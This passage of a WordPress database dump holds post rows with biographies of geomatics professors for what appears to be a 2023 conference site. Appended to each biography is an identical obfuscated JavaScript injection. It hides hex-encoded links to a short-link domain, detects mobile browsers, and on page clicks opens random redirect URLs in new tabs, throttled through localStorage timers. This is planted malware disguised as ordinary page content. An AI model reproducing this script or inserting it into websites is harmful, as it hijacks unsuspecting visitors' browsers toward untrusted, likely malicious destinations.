|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Prof. Mahmoud Salah</strong>','','publish','closed','closed','','prof-mahmoud-salah','','','2023-01-14 20:59:22','2023-01-14 20:59:22','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3587',0,'dt_team','',0),
(3588,1,'2023-01-14 20:58:44','2023-01-14 20:58:44','','loc6','','inherit','open','closed','','loc6','','','2023-01-14 20:58:44','2023-01-14 20:58:44','',3587,'https://gsw2023.com/wp-content/uploads/2023/01/loc6.jpg',0,'attachment','image/jpeg',0),
(3589,1,'2022-02-14 10:00:48','2022-02-14 10:00:48','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>·        Professor of Surveying, Geodesy and GIS – Geomatics Engineering Department - Faculty of Engineering at  Shubra - Benha University – Egypt.<br><em> </em>·        Former Vice Dean for Community Service and Environmental Development Affairs Faculty of Engineering at Shubra - Benha University - Egypt 2020 - July 2022.<br>·        Former Head of the Geomatics Engineering Department - Faculty of Engineering at Shubra - Benha University - Egypt 2018-2020.<br>·        He holds a PhD from the Technical University- Graz- Austria - 1996.<br>·        Prof. Amr Ali is sharing in teaching different courses in the fields of Surveying, Geodesy and GIS to the undergraduate, postgraduate students at the Geomatics Engineering Department.<br>·        Coordinator of the cooperation activities between Benha University and the Egyptian Space Agency 2020 to date.<br>·        Technical GIS advisor at the General Authority for Urban Planning to design and implement a unified spatial information system “Spad-GIS” 2017 to date.<br>·        Technical advisor to the National Center for State Land Use in the field of spatial data analysis 2020 to date.<br>·        Technical advisor to the World Bank in evaluating the technological information infrastructure for a group of governmental agencies in 2018 to date.<br>·        Technical advisor at the Ministry of Communications and Information Technology \"Geographic Information Systems Sector\" in some projects to recover state lands 2017-2019.<br>·        Member of the National Committee for the Survey, Maps and GIS Division, Ministry of Water Resources and Irrigation 2012 to date.<br>·        Technical advisor to the Arab Survey Union 2015 to date.<br>·        Representative of Egypt in the International Federation of Surveying “FIG” in the field of education 2012 to date.<br>·        Technical advisor to the National Authority for Remote Sensing and Space Sciences 2016-2018.<br> <br>During the last 40 years, Prof. Amr Ali has distinguished knowledge and extensive experience in many fields related to spatial data science.<br>At the level of national projects in the field of spatial sciences, Prof. Ali participated in the preparation and implementation of several projects.<br>   <br>Prof. Amr Ali has published more than 50 papers in the fields of geodesy, navigation systems and geomatics in many local / international journals. In addition, he is participating in the judgment of many papers in a group of local and international journals.<br> <br>He also supervised many masters and doctoral dissertations in the Egyptian universities and some European universities<br> <br>In the field of community service, Prof. Amr Hanafi is a member of several non-profit NGOs to share in the Geo-Socio-Economical Studies.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Amr Ali','','publish','closed','closed','','prof-amr-ali','','','2023-04-02 07:24:17','2023-04-02 07:24:17','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3589',0,'dt_team','',0),
(3590,1,'2023-01-14 21:01:07','2023-01-14 21:01:07','','loc7','','inherit','open','closed','','loc7','','','2023-01-14 21:01:07','2023-01-14 21:01:07','',3589,'https://gsw2023.com/wp-content/uploads/2023/01/loc7.jpg',0,'attachment','image/jpeg',0),
(3591,1,'2023-01-14 21:09:46','2023-01-14 21:09:46','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td class=\"has-text-align-left\" data-align=\"left\">·        <strong>E-mail:</strong>  <strong><a href=\"mailto:latifah.mahmoud@feng.bu.edu.eg\">latifah.mahmoud@feng.bu.edu.eg</a><br></strong>                       loutfia_karam2001@hotmail.com<br> <br>Dr.Eng. Loutfia ElSonbaty hold a position of Assistant professor at Department of Geomatics, Faculty of Engineering at shoubra, Benha University, Cairo, Egypt. She has completed her Ph.D. in photogrammetry and remote sensing from Benha University and her MSc. Degree from Cairo university .She has a history of working in field of remote sensing, Global positioning system, and digital image processing.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 